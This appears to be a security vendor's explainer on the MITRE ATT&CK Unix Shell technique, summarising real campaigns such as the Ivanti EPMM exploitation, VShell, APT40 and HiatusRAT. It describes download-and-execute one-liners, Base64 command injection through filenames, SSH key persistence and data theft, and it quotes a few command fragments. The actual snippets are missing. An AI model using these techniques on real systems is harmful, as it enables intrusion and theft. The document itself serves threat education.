T1059.004 Unix Shell in MITRE ATT&CK Explained

What Is T1059.004 Unix Shell in MITRE ATT&CK?

T1059.004 Unix Shell is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of Unix shell environments on Unix-like operating systems to execute commands and scripts on a host.

Unix shells provide a command-line interface and scripting environment for interacting with the operating system. Common shell variants include the Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), and Korn Shell (ksh). These shells support scripting features such as variables, conditional logic, loops, and file operations, enabling automation of system tasks and program execution. This functionality is widely used for legitimate system administration and automation across Linux and Unix-based systems.

To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.

Adversary Use of T1059.004 Unix Shell

Adversaries use T1059.004 Unix Shell to execute malicious commands and scripts by abusing native shell environments commonly present on Unix-like systems. Because shells such as sh and bash are standard components of these operating systems, their use can blend into normal administrative activity and evade detection focused on non-native tools.

In attack campaigns, adversaries leverage Unix shells to run commands, execute scripts, deploy payloads, modify system configurations, and orchestrate follow-on actions such as persistence or lateral movement. Shell commands are frequently embedded within exploit chains, cron jobs, startup scripts, or remote access mechanisms, making Unix shell usage a recurring element in real-world adversary tradecraft.

Procedure Examples Used by Adversaries in Red Report 2026

Downloading and Executing Malicious Payloads

Adversaries use simple, obfuscated shell one-liners over SSH or remote shells to fetch and run payloads, establishing a foothold quickly.

In a May 21, 2025 analysis of a China-nexus actor exploiting Ivanti EPMM, operators delivered a short bash sequence that downloads a binary to /tmp/1, makes it executable, and runs it [1]:

The one-liner tries multiple downloaders (wget → curl → fetch) to maximize success across environments, writes the payload to a transient location (/tmp/1), sets execution permission, and immediately executes it. If the file is downloaded and executable, the host runs the attacker's code; if the download fails or permissions are blocked, the sequence aborts (observable as failed commands or missing /tmp/1).

Attackers favor this pattern because it's compact, reliable across Unix variants, and quickly establishes persistence or a backdoor for follow-on activity (credential theft, lateral movement, data exfiltration).

Defense Evasion: Execute In-Memory Payload (MITRE T1564)

Adversaries crafted malicious filenames that execute Bash code when expanded or evaluated in a shell script.

In the August 2025 threat analysis of the VShell campaign, the .rar attachment contained a file whose name embedded a Base64-encoded Bash downloader [2]:

When a shell command such as for f in *; do eval "echo $f"; done processed this filename, the payload decoded and executed, downloading a secondary Bash script from the attacker's server.

The secondary script then determined system architecture (ARCH=$(uname -m)), fetched the matching ELF loader via curl -fsSL, and launched it silently with multiple nohup fallbacks:

This sequence ensures the payload can run in restricted environments, runs in the background with no output, and avoids writing the final decrypted VShell backdoor to disk. Instead, the loader executes the payload directly in memory using fexecve() and masquerades the process as a kernel thread ([kworker/0:2]).

Procedure Examples Used by Adversaries in Red Report 2025

Exploitation with SSH

In January 2024, security researchers uncovered multiple vulnerabilities in the OAS Engine, exposing critical flaws in its existing releases [3]. The exploitation of vulnerabilities in the OAS Engine illustrates how seemingly minor issues can be combined to achieve significant privilege escalation on Unix-based systems. After gaining authentication, an attacker can explore the filesystem for critical files like sshd_config or .ssh/authorized_keys, using commands such as:

This reconnaissance helps identify SSH configurations and determine if public key authentication is enabled. Leveraging the OAS Engine's vulnerabilities, the attacker manipulates the system to inject their SSH public key into the authorized_keys file, mimicking a command like:

This ensures persistent access, allowing them to connect via SSH:

With shell access established, the attacker may further manipulate configuration files, such as .bashrc or .zshrc, to modify the environment and maintain control, for example:

By combining application vulnerabilities with Unix shell tools, the attacker gains elevated access and system control, highlighting the critical need for timely patching and secure configurations.

Impair Defenses: Modify System Firewall (T1562.004)

In another example showcased by CISA in July 2024, APT40 leverages Unix shell tools extensively to maintain access and execute commands on compromised systems [4]. After gaining initial access, the group deploys web shells, enabling arbitrary command execution through Unix shells such as bash or zsh. This provides a flexible environment for reconnaissance, credential harvesting, and lateral movement.

For instance, the actors use tools like nmap for network scanning, as well as commands such as iptables-save to manipulate firewall configurations and create unauthorized access points:

These actions enable persistence and facilitate exfiltration over secure or tunneled channels.

Downloading, Loading and Executing Malicious Payloads

In the CISA advisory released in February 2024, Volt Typhoon adversaries leveraged Unix Shell as part of their command and scripting interpreter techniques to maintain and expand their access within compromised environments [5]. Specifically, the Unix Shell was utilized alongside other command-line interfaces such as PowerShell and Windows Management Instrumentation (WMI), providing the attackers with a versatile and stealthy means of executing commands, managing processes, and streaming data across networks.

This method, facilitated through tools like Brightmetricagent.exe, demonstrates their ability to integrate advanced shell capabilities for bi-directional data streaming, remote execution, and precise manipulation of compromised systems while evading detection through legitimate system processes.

Procedure Examples Used by Adversaries in Red Report 2024

File Execution

In September 2023, CISA released a malware analysis report analyzing five malware samples. One of the samples was the SUBMARINE backdoor [6].

The file name is designed to exploit a vulnerability in the target environment where the base64 string within the file name will be executed on the Linux shell [6]. The malware first uses chmod +x to modify the permissions of directories or files in /root/mac*, granting executable rights. Subsequently, it employs the sh command to execute all files or scripts matching the pattern /root/mach*. This behavior pattern indicates an attempt to execute arbitrary code with elevated permissions.

Exploitation for Credential Access

Adversaries often leverage Unix Shell to exploit a vulnerability in the target system and exfiltrate sensitive information, including valid account credentials. For instance, in July 2024, the InfoSec community saw a fake Linux vulnerability exploit that dropped data-stealing malware on the victim's computer [7].

This fake PoC masquerades as a high-severity use-after-free exploit (CVE-2023-35829) by leveraging namespaces to create a fake root shell. However, instead of triggering the vulnerability, it utilizes this deceptive shell to buy time for hidden malware. Upon launch, the PoC creates a persistent "kworker" file in /etc/bashrc and contacts a C2 server to download a malicious Linux bash script via URL. This script then steals data from /etc/passwd, adds the attacker's SSH key to ~/.ssh/authorized_keys for remote access, and exfiltrates the data via transfer.sh. Essentially, the PoC acts as a trojan horse, deploying actual malware under the guise of a harmless exploit.

Exploitation for Remote Code Execution

Adversaries often leverage Unix Shell to download and execute commands on the target machine.

For instance, the vulnerability CVE-2022-39952 in Fortinet's FortiNAC is exploited using the 'configApplianceXml' script [8], which unsets any 'cd' command alias and changes the working directory to root ('/'). It then uses the 'unzip' utility to extract an uploaded file ('upload.applianceKey') to the file system. Due to the working directory being root, attackers can craft a ZIP file to write arbitrary files anywhere in the file system, including '/etc/cron.d/'. This could be used to create a cron job that executes a reverse shell or other malicious commands with root privileges, granting full control to the attacker.

Downloading, Loading and Executing Malicious Payloads

In one malware campaign reported in March 2023, attackers deployed a bash script on infected routers to download three components: the malicious HiatusRAT, a legitimate network traffic capture tool 'tcpdump,' and additional payloads [9].

The Hiatus bash script, shown in the below code snipped, is designed to execute on compromised routers, where it checks for the existence of a file named '.updata' in the '/database' directory. If the file exists and is executable, it runs it; if it exists but is not executable, the script changes the file permissions to make it executable and then runs it. If the file doesn't exist, the script downloads the payload from a specified URL to the '.updata' file, assigns execution permissions, and executes it.

Validate Your Defenses Against the Red Report 2026 Threats

References

[1] “China-Nexus Threat Actor Actively Exploiting Ivanti Endpoint Manager Mobile (CVE-2025-4428) Vulnerability.” Available: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability. [Accessed: Nov. 05, 2025]

[2] Available: https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/. [Accessed: Nov. 05, 2025]

[3] J. Rittle, “OAS Engine Deep Dive: Abusing low-impact vulnerabilities to escalate privileges,” Cisco Talos Blog, Jan. 31, 2024. Available: https://blog.talosintelligence.com/oas-engine-deep-dive/. [Accessed: Nov. 27, 2024]

[4] “Website.” Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a

[5] “Website.” Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

[6] “[No title].” Available: https://www.cisa.gov/sites/default/files/2023-09/MAR-10454006.r5.v1.CLEAR__0.pdf. [Accessed: Dec. 19, 2023]

[7] B. Toulas, “Fake Linux vulnerability exploit drops data-stealing malware,” BleepingComputer, Jul. 13, 2023. Available: https://www.bleepingcomputer.com/news/security/fake-linux-vulnerability-exploit-drops-data-stealing-malware/. [Accessed: Dec. 20, 2023]

[8] B. Toulas, “Exploit released for critical Fortinet RCE flaw, patch now,” BleepingComputer, Feb. 21, 2023. Available: https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-fortinet-rce-flaw-patch-now/. [Accessed: Dec. 20, 2023]

[9] B. Toulas, “New malware infects business routers for data theft, surveillance,” BleepingComputer, Mar. 06, 2023. Available: https://www.bleepingcomputer.com/news/security/new-malware-infects-business-routers-for-data-theft-surveillance/. [Accessed: Dec. 20, 2023]